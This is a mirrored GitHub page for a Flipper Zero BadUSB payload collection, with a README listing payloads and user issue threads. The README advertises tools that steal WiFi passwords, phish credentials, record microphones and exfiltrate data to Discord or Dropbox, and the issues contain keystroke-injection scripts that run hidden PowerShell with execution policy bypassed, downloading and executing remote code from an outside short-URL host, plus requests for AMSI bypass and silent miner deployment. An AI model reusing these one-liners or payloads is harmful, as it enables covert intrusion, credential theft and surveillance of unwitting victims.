Giter Site home page Giter Site logo

i-am-jakoby / flipper-zero-badusb Goto Github PK

View Code? Open in Web Editor NEW
4.5K 122.0 591.0 25.31 MB

Repository for my flipper zero badUSB payloads. Now almost entirely plug and play.

PowerShell 99.83% HTML 0.17%
badusb badusb-payloads flipper-zero flipperzero hak5

flipper-zero-badusb's Introduction

πŸ’€ BadUSB πŸ’€

Python

Subscribing to my YouTube would also be greatly appreciated.

C#

Table of Contents

Description

The Payloads

Contact

Acknowledgments

Unleash the power of your Flipper πŸ€“πŸ’»


Description

πŸ₯‡ I am in 1st place for most payloads submitted to Hak5❗

πŸ”“ I have taken my colllection of payloads and formatted them to work for the Flipper for all of you to use❗

⚠️ Please ENJOY and use RESPONSIBLY❗

hak 5

The Payloads

This repository has been optimized to facilitate plug and play functionality.

I purchased the domain jakoby.lol for the sole purpose of creating my own short URLs.

I did this with the intention of making room for Discord webhooks and Dropbox tokens to fit in my one-liners.

This, in turn, makes it so the user no longer needs to host their own version of the script.

Payloads Description Plug'n'Play Author
VoiceLogger Activates your target's microphone, converts their speech to text, and exfils it to Discord. βœ… Jakoby
Evil-Goose A payload that hires a goose to hack your target in real time. βœ… Jakoby
ADV-Recon A script used to do an advanced level of recon on the target's computer. βœ… Jakoby
AcidBurn A script I put together to be used on your friends or foes. Prepare to be roasted. βœ… Jakoby
Jump-Scare Just a little jumpscare that changes the target's wallpaper. βœ… Jakoby
Jump-Scare V2 Just a little jumpscare that plays a video in the target's PowerShell console. βœ… Jakoby
ADV-RickRoll RickRoll that plays in the PowerShell console after a mouse movement is detected. βœ… Jakoby
PineApple Connect a target's PC to your WiFi PineApple. β›” Jakoby
Play-WAV Download a WAV file and play it after a mouse movement is detected. βœ… Jakoby
Rage-Pop-Ups Generates an infinite loop of insulting pop-ups. β›” Jakoby
Subscribe Used to make your target subscribe to your YouTube channel. βœ… Jakoby
Must Sub A script used to make your target subscribe to 15 of Jakoby's favorite YouTube channels. βœ… Jakoby
PS-Draw A script used to generate and draw images in the PowerShell window. β›” Jakoby
WallPaper-Troll Collects sensitive info from your target and displays it as their wallpaper to taunt them. βœ… Jakoby
WallPaper-URL Sets the target's wallpaper to an image you provide via a URL after a mouse movement is detected. βœ… Jakoby
We-Found-You Opens a map with your target's current location on it. βœ… Jakoby
YT-Tripwire Opens any YouTube video after a mouse movement is detected. βœ… Jakoby
Credz-Plz A script used to prompt the target to enter their credentials to later be exfiltrated. βœ… Jakoby
Shortcut Jacker A script used to embed malware in the shortcut on your target's desktop. β›” Jakoby
Wifi Grabber Grabs your target's WiFi passwords and uploads them to either Dropbox, Discord, or both. βœ… Jakoby
IP Grabber Grabs your target's IP addresses and uploads them to either Dropbox, Discord, or both. βœ… Jakoby
Browser Data This payload can be used to retrieve the browsing history and bookmarks of your target. βœ… Jakoby

Contact

πŸ“± My Socials πŸ“±

C#
YouTube
Python
Twitter
Golang
Instagram
Jsonnet
Discord
Jsonnet
TikTok

Acknowledgments

(back to top)

flipper-zero-badusb's People

Contributors

falsephilosopher avatar i-am-jakoby avatar kavitate avatar nocomp avatar uberguidoz avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

flipper-zero-badusb's Issues

AMSI bypass

seems like a lot of payloads are getting caught by AMSI. is it possible to have a "stage 0" where the script downloads your payload, applies an AMSI bypass and/or obfuscation, and then runs the payload? I've been trying to think of a way to do this non-deterministically so that no two executions would look the same but my knowledge of powershell isn't that good (yet lol).

i need help

hay can i use an extra usb flash drive to host ur powershell commands ? i would use flipper to run ducky and instead of iwr to dl from my dbox i could have ducky/flipper use a flash drive to host my eth minning script so i can set up all my home minners quickly and silently any ideas or input would be greatly appreciated thxz homie happy hackin.....

or can i convert the powershell script to ducky or base64 then to ducky an run that from flipper ? still tryin to get my head around everything

-w not reconised???

GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex
DELAY 500
ENTER
image

Question : is it possible to run more at once

So these script also work on a rubber ducky USB so I was wondering if it was possible to run more at once I've tired to do
"GUI r
DELAY 500
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex
ENTER
DELAY 500
GUI r
DELAY 500
STRING powershell -w h -NoP -Ep Bypass $channel="'youtube.com/iamjakoby'";irm jakoby.lol/wj4 | iex
ENTER"
But only the last one works both of them run just fine but only the last one gets fully executed so I was wondering if it was possible to do a system where it waits for the first to get done then does the second

Additional Feature - Identify remote storage tools

Hey Jakoby,

I haven't had the opportunity to build this yet but though this might come in handy for enumerating remote storage tools that may not be signed into.

# New Feature: Cloud Services Enumeration
try {
    $cloudServices = Get-WmiObject Win32_Process | Where-Object { $_.Name -match 'Dropbox|OneDrive|GoogleDrive' } | Select-Object Name
} catch {
    $cloudServices = "Error in detecting cloud services"
}

Response:

PS C:\Users\User> $cloudServices

Name
----
OneDrive.exe

Keylogger Error

Whenever I run the keylogger.txt it works fine it just pops up that it was detected, I was wondering how long it would take to fix.

ADV recon on win 11 (solved)

Doesn't work with win 11 tested on win 10 worked fine, also sorry I cant give an error message

Edit: tamperd and fixed it

How to use

Honestly have no idea how to use the Discord or Dropbox required txt files. it just won't work even with the key and the webhook

Advanced Recon Upload Problems

Hey Jakoby,

first of all thanks for the nice work and keep it up.

Second I got a problem with the script not uploading the file to my dropbox. Found your Youtube tutorial as well and that script with the same Access Key worked just fine, so I don't know what I'm missing.

Would be really happy if you could help me.

Alle the best.

Max

please can you clarify

hi I seen there is a bad usb script called we found you. I'm unsure how this script operates though, surely you already know where the person is if youve gained physical access to their PC with a bad usb, so why would you need a location ping? I'm just genuinely unsure how this is utilised, any info would be great help.

hope to hear from you soon,
thanks in advance.

ip gabber not working?

i was going to prank my freinds but it ran the code yet nothing happened can some one please help thank you

Too much storage

when I downloaded it, and did all the steps its said, "this file is too bi, still want to install it?" and i clicked yes then it took a while to download and then all my other apps said they were out of date and i couldn't open them so i removed the file that was 2MILLION+ GIGS but then i had to update all my apps and it worked again. Please help me with this.

Ban from using discord webhook

Hello Jakoby, and any users reading this.

I'd like to bring up this issue to let people know that you can get banned from using the discord webhook.

While i was testing it out on a VM, and was exfiltrating data from the VM to my discord server, i got a suspension issued not 6 hours later for "Hacking and malicious activity on discord".

Id like people to know about this, so they can be more careful about using the discord webhook

image

Wifi Pass is empty

Hi Guys,

The Wifi-Grapper payload seems to work fine but when i receive the file on my discord it is empty.

Any idea ?

Thanks.

RickRoll payload video not loading (blank window)

Hi,

I'm trying to run the rickroll payload. I get a window (powershell video player) but its empty, the video is not showing up. I checked the code but I don't know the problem. I see the mp4 video is downloaded in my temp folder. I did not change the code. I'm testing on Win10

VoiceLogger

Cannot get the voicelogger function to stop after saying exit.

Jumpscare 2.0 enhancement

I believe that using clear and descriptive variable names can help new users better understand the purpose and function of the script.

Therefore i rewrote the script a bit:

powershell -UseBasicParsing -w h -NoP -NonI -Ep Bypass;$TempPath="$env:tmp";Invoke-WebRequest -Uri 'https://jakoby.lol/kiv' -OutFile "$TempPath\js.zip";Expand-Archive "$TempPath\js.zip" -DestinationPath $TempPath -Force;. "$TempPath\js\js.ps1"

WifiGrabber.ps1 does not work on non-english systems

if the locale is not English , the output of the netsh wlan show profile name... command does not contain Key Content.

I have not figured out PS yet to find a reliable universal solution that leaves no traces in the system. Temporarily use several scripts for individual languages

possible solution:

[System.Threading.Thread]::CurrentThread.CurrentCulture = "en-US"
or
$env:LCID = "1033"

but ran into problems in Win 10

Credz-plz on windows 11

After you click ok on "re-auth your Microsoft account" it just says "credentials cannot be empty" and when you click ok it keeps popping up (tested on 2 windows 11 machines and 1 windows 10)

The user clicked: OK

You cannot call a method on a null-valued expression.

At line:61 char:5

  • $cred.getnetworkcredential().password
    
  • ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException

    • FullyQualifiedErrorId : InvokeMethodOnNull

Advance rekon - Dropbox token

Hey there,

The dropbox access token is quite short-lived,
Is there a way to implement a refresh mechanism within the script ?

Cheers
CyD

Wifigrabber

Hello. I got an issue with the wifigrabber using a discord webhook. This is the error message:

{"message": "Invalid Webhook Token", "code": 50027}
PS C:\WINDOWS\system32\WindowsPowerShell\v1.0>

I already tried several times to change the webhook, and followed your instructions on the video, but somehow it doesn't work for me. Any idea ?

Won't start Rick Roll

When i run the Rick Roll it runs and opens the powershell for a second and closes it again but when I try moving my mouse nothing happens. But if I manualy write it and hit enter it runs and opens powershell and when I move my mouse it starts.

BadUSB Wallpaper-URL always running

I ran the script of Wallpaper-URL, from the collection of BadUSB and since that moment when I power on my computer the wallpaper changes to the picture of the URL always

Any idea to delete the script from wherever it is?

Thanks

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    πŸ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. πŸ“ŠπŸ“ˆπŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❀️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.